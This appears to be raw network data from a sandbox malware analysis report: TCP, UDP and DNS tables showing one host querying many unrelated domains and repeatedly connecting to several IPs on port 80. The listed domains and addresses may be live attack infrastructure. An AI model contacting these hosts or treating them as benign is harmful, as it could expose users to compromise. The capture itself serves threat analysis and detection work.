Aug 13, 2024 06:44:50.691066980 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:50.696037054 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:50.696074009 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.389873981 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.389914989 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.389961004 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:51.389969110 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.390023947 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.390058041 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.390069008 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:51.390142918 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.390176058 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.390189886 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:51.390209913 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.390243053 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.390249968 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:51.390383959 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.390435934 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:51.395241976 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.395349979 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.395384073 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.395396948 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:51.395524979 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.395569086 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:51.503180981 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.503211975 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.503243923 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.503272057 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:51.503334999 CEST	80	49735	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:51.503387928 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:52.234365940 CEST	49735	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.246951103 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.255362988 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.255438089 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.257211924 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.262154102 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.856725931 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.856784105 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.856821060 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.856834888 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.856856108 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.856894016 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.856928110 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.856937885 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.856965065 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.856972933 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.857003927 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.857048988 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.857290983 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.857327938 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.857372046 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.862046957 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.862133026 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.862169981 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.862176895 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.916452885 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.945626974 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.945676088 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.947068930 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:53.947103977 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.949039936 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.951520920 CEST	49736	80	192.168.2.5	199.192.19.19
Aug 13, 2024 06:44:53.967710018 CEST	80	49736	199.192.19.19	192.168.2.5
Aug 13, 2024 06:44:58.989306927 CEST	49737	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:44:58.994307995 CEST	80	49737	213.145.228.16	192.168.2.5
Aug 13, 2024 06:44:58.994388103 CEST	49737	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:44:58.996001005 CEST	49737	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:44:59.001144886 CEST	80	49737	213.145.228.16	192.168.2.5
Aug 13, 2024 06:44:59.712213993 CEST	80	49737	213.145.228.16	192.168.2.5
Aug 13, 2024 06:44:59.712266922 CEST	80	49737	213.145.228.16	192.168.2.5
Aug 13, 2024 06:44:59.712305069 CEST	80	49737	213.145.228.16	192.168.2.5
Aug 13, 2024 06:44:59.712323904 CEST	49737	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:44:59.712341070 CEST	80	49737	213.145.228.16	192.168.2.5
Aug 13, 2024 06:44:59.712388992 CEST	49737	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:44:59.715013981 CEST	80	49737	213.145.228.16	192.168.2.5
Aug 13, 2024 06:44:59.715071917 CEST	80	49737	213.145.228.16	192.168.2.5
Aug 13, 2024 06:44:59.715125084 CEST	49737	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:00.512556076 CEST	49737	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:01.529544115 CEST	49738	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:01.535043001 CEST	80	49738	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:01.535136938 CEST	49738	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:01.537466049 CEST	49738	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:01.542538881 CEST	80	49738	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:02.286267042 CEST	80	49738	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:02.286325932 CEST	80	49738	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:02.286367893 CEST	80	49738	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:02.286397934 CEST	80	49738	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:02.286411047 CEST	49738	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:02.286489010 CEST	80	49738	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:02.286571026 CEST	49738	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:02.291357040 CEST	80	49738	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:02.291465044 CEST	80	49738	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:02.291475058 CEST	49738	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:02.292360067 CEST	49738	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:03.041251898 CEST	49738	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:04.059716940 CEST	49739	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:04.064743042 CEST	80	49739	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:04.064858913 CEST	49739	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:04.068541050 CEST	49739	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:04.073447943 CEST	80	49739	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:04.073512077 CEST	80	49739	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:04.824398041 CEST	80	49739	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:04.824440002 CEST	80	49739	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:04.824455976 CEST	80	49739	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:04.824822903 CEST	49739	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:04.826433897 CEST	80	49739	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:04.826525927 CEST	49739	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:04.826541901 CEST	80	49739	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:04.826702118 CEST	49739	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:05.582029104 CEST	49739	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:06.592557907 CEST	49740	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:06.597565889 CEST	80	49740	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:06.597757101 CEST	49740	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:06.599507093 CEST	49740	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:06.604377985 CEST	80	49740	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:07.934077978 CEST	80	49740	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:07.934102058 CEST	80	49740	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:07.934118986 CEST	80	49740	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:07.934134960 CEST	80	49740	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:07.934154987 CEST	80	49740	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:07.934170008 CEST	80	49740	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:07.934186935 CEST	80	49740	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:07.934242964 CEST	49740	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:07.934309006 CEST	49740	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:07.934309959 CEST	49740	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:07.939224005 CEST	49740	80	192.168.2.5	213.145.228.16
Aug 13, 2024 06:45:07.944247007 CEST	80	49740	213.145.228.16	192.168.2.5
Aug 13, 2024 06:45:12.994008064 CEST	49741	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:12.999205112 CEST	80	49741	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:12.999303102 CEST	49741	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:13.001324892 CEST	49741	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:13.006316900 CEST	80	49741	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:13.651595116 CEST	80	49741	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:13.651665926 CEST	80	49741	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:13.651730061 CEST	49741	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:14.512573957 CEST	49741	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:15.529422045 CEST	49742	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:15.534883022 CEST	80	49742	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:15.534984112 CEST	49742	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:15.537708044 CEST	49742	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:15.542634964 CEST	80	49742	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:16.174560070 CEST	80	49742	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:16.174834013 CEST	80	49742	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:16.175118923 CEST	49742	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:17.041301966 CEST	49742	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:18.060844898 CEST	49743	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:18.066217899 CEST	80	49743	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:18.066667080 CEST	49743	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:18.070597887 CEST	49743	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:18.075552940 CEST	80	49743	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:18.075681925 CEST	80	49743	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:18.733165979 CEST	80	49743	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:18.733251095 CEST	80	49743	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:18.734658957 CEST	49743	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:19.572501898 CEST	49743	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:20.591909885 CEST	49744	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:20.597372055 CEST	80	49744	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:20.600734949 CEST	49744	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:20.603003979 CEST	49744	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:20.608067036 CEST	80	49744	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:21.238698959 CEST	80	49744	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:21.239146948 CEST	80	49744	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:21.239206076 CEST	49744	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:21.241811991 CEST	49744	80	192.168.2.5	91.195.240.19
Aug 13, 2024 06:45:21.247970104 CEST	80	49744	91.195.240.19	192.168.2.5
Aug 13, 2024 06:45:26.349786997 CEST	49745	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:26.354882956 CEST	80	49745	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:26.355128050 CEST	49745	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:26.359544039 CEST	49745	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:26.364454985 CEST	80	49745	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:27.053534031 CEST	80	49745	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:27.053556919 CEST	80	49745	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:27.053579092 CEST	80	49745	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:27.053595066 CEST	80	49745	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:27.053610086 CEST	80	49745	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:27.053610086 CEST	49745	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:27.053647041 CEST	49745	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:27.053764105 CEST	49745	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:27.869340897 CEST	49745	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:28.888144970 CEST	49746	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:28.893547058 CEST	80	49746	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:28.896943092 CEST	49746	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:28.896943092 CEST	49746	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:28.902524948 CEST	80	49746	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:29.592017889 CEST	80	49746	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:29.592065096 CEST	80	49746	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:29.592099905 CEST	80	49746	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:29.592116117 CEST	49746	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:29.592153072 CEST	80	49746	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:29.592185020 CEST	80	49746	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:29.592199087 CEST	49746	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:29.592231035 CEST	49746	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:30.400831938 CEST	49746	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:31.464426994 CEST	49747	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:31.469641924 CEST	80	49747	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:31.469734907 CEST	49747	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:31.495299101 CEST	49747	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:31.500668049 CEST	80	49747	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:31.500904083 CEST	80	49747	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:32.151240110 CEST	80	49747	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:32.151288986 CEST	80	49747	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:32.151329041 CEST	80	49747	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:32.151361942 CEST	80	49747	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:32.151382923 CEST	49747	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:32.151393890 CEST	80	49747	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:32.155101061 CEST	49747	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:33.010035992 CEST	49747	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:34.082582951 CEST	49748	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:34.087622881 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.090761900 CEST	49748	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:34.107176065 CEST	49748	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:34.112231970 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.777005911 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.777066946 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.777105093 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.777141094 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.777175903 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.777214050 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.777244091 CEST	49748	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:34.777244091 CEST	49748	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:34.777271986 CEST	49748	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:34.777318954 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.777354002 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.777390003 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.777424097 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:34.779196024 CEST	49748	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:34.784038067 CEST	49748	80	192.168.2.5	194.58.112.174
Aug 13, 2024 06:45:34.789398909 CEST	80	49748	194.58.112.174	192.168.2.5
Aug 13, 2024 06:45:39.817090988 CEST	49749	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:39.822175980 CEST	80	49749	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:39.822248936 CEST	49749	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:39.824090958 CEST	49749	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:39.829133034 CEST	80	49749	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:41.338068008 CEST	49749	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:41.343880892 CEST	80	49749	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:41.343945980 CEST	49749	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:42.358758926 CEST	49750	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:42.363745928 CEST	80	49750	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:42.363842964 CEST	49750	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:42.366688013 CEST	49750	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:42.372021914 CEST	80	49750	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:43.869376898 CEST	49750	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:43.875411034 CEST	80	49750	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:43.875471115 CEST	49750	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:44.890712976 CEST	49751	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:44.896244049 CEST	80	49751	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:44.900401115 CEST	49751	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:44.900401115 CEST	49751	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:44.906034946 CEST	80	49751	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:44.906076908 CEST	80	49751	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:46.416615009 CEST	49751	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:46.426918030 CEST	80	49751	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:46.428693056 CEST	49751	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:47.435419083 CEST	49752	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:47.441761971 CEST	80	49752	172.67.210.102	192.168.2.5
Aug 13, 2024 06:45:47.441831112 CEST	49752	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:47.443773985 CEST	49752	80	192.168.2.5	172.67.210.102
Aug 13, 2024 06:45:47.449120998 CEST	80	49752	172.67.210.102	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 13, 2024 06:42:35.785130024 CEST	56222	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:42:35.810741901 CEST	53	56222	1.1.1.1	192.168.2.5
Aug 13, 2024 06:42:51.623019934 CEST	57885	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:42:51.649452925 CEST	53	57885	1.1.1.1	192.168.2.5
Aug 13, 2024 06:43:04.904978991 CEST	59573	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:43:04.917272091 CEST	53	59573	1.1.1.1	192.168.2.5
Aug 13, 2024 06:43:12.983134031 CEST	52741	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:43:12.992346048 CEST	53	52741	1.1.1.1	192.168.2.5
Aug 13, 2024 06:43:21.047974110 CEST	59836	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:43:21.539532900 CEST	53	59836	1.1.1.1	192.168.2.5
Aug 13, 2024 06:43:35.265568972 CEST	56556	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:43:35.274709940 CEST	53	56556	1.1.1.1	192.168.2.5
Aug 13, 2024 06:43:43.342601061 CEST	52083	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:43:44.017103910 CEST	53	52083	1.1.1.1	192.168.2.5
Aug 13, 2024 06:43:57.529781103 CEST	50837	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:43:57.627701044 CEST	53	50837	1.1.1.1	192.168.2.5
Aug 13, 2024 06:44:10.988688946 CEST	54793	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:44:11.574134111 CEST	53	54793	1.1.1.1	192.168.2.5
Aug 13, 2024 06:44:45.576457024 CEST	50702	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:44:45.602709055 CEST	53	50702	1.1.1.1	192.168.2.5
Aug 13, 2024 06:44:58.966247082 CEST	58992	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:44:58.987118006 CEST	53	58992	1.1.1.1	192.168.2.5
Aug 13, 2024 06:45:12.951404095 CEST	59519	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:45:12.991554022 CEST	53	59519	1.1.1.1	192.168.2.5
Aug 13, 2024 06:45:26.252846956 CEST	50155	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:45:26.346651077 CEST	53	50155	1.1.1.1	192.168.2.5
Aug 13, 2024 06:45:39.794569016 CEST	53745	53	192.168.2.5	1.1.1.1
Aug 13, 2024 06:45:39.815001965 CEST	53	53745	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 13, 2024 06:42:35.785130024 CEST	192.168.2.5	1.1.1.1	0x29d3	Standard query (0)	www.hprlz.cz	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:42:51.623019934 CEST	192.168.2.5	1.1.1.1	0xd2e8	Standard query (0)	www.catherineviskadi.com	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:04.904978991 CEST	192.168.2.5	1.1.1.1	0x846c	Standard query (0)	www.hatercoin.online	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:12.983134031 CEST	192.168.2.5	1.1.1.1	0xaa5	Standard query (0)	www.fourgrouw.cfd	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:21.047974110 CEST	192.168.2.5	1.1.1.1	0x9689	Standard query (0)	www.bfiworkerscomp.com	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:35.265568972 CEST	192.168.2.5	1.1.1.1	0xb54b	Standard query (0)	www.tinmapco.com	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:43.342601061 CEST	192.168.2.5	1.1.1.1	0xa380	Standard query (0)	www.xn--fhq1c541j0zr.com	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:57.529781103 CEST	192.168.2.5	1.1.1.1	0x91d4	Standard query (0)	www.xn--matfrmn-jxa4m.se	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:44:10.988688946 CEST	192.168.2.5	1.1.1.1	0x371	Standard query (0)	www.anuts.top	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:44:45.576457024 CEST	192.168.2.5	1.1.1.1	0xe0a8	Standard query (0)	www.telwisey.info	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:44:58.966247082 CEST	192.168.2.5	1.1.1.1	0xd0f0	Standard query (0)	www.sandranoll.com	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:45:12.951404095 CEST	192.168.2.5	1.1.1.1	0xa799	Standard query (0)	www.gipsytroya.com	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:45:26.252846956 CEST	192.168.2.5	1.1.1.1	0xa84f	Standard query (0)	www.helpers-lion.online	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:45:39.794569016 CEST	192.168.2.5	1.1.1.1	0x3e5	Standard query (0)	www.dmtxwuatbz.cc	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 13, 2024 06:42:35.810741901 CEST	1.1.1.1	192.168.2.5	0x29d3	No error (0)	www.hprlz.cz		5.44.111.162	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:42:51.649452925 CEST	1.1.1.1	192.168.2.5	0xd2e8	No error (0)	www.catherineviskadi.com		217.160.0.106	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:04.917272091 CEST	1.1.1.1	192.168.2.5	0x846c	Name error (3)	www.hatercoin.online	none	none	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:12.992346048 CEST	1.1.1.1	192.168.2.5	0xaa5	Name error (3)	www.fourgrouw.cfd	none	none	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:21.539532900 CEST	1.1.1.1	192.168.2.5	0x9689	No error (0)	www.bfiworkerscomp.com		208.91.197.27	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:35.274709940 CEST	1.1.1.1	192.168.2.5	0xb54b	Name error (3)	www.tinmapco.com	none	none	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:44.017103910 CEST	1.1.1.1	192.168.2.5	0xa380	No error (0)	www.xn--fhq1c541j0zr.com		43.252.167.188	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:43:57.627701044 CEST	1.1.1.1	192.168.2.5	0x91d4	No error (0)	www.xn--matfrmn-jxa4m.se		194.9.94.85	A (IP address)	IN (0x0001)	false
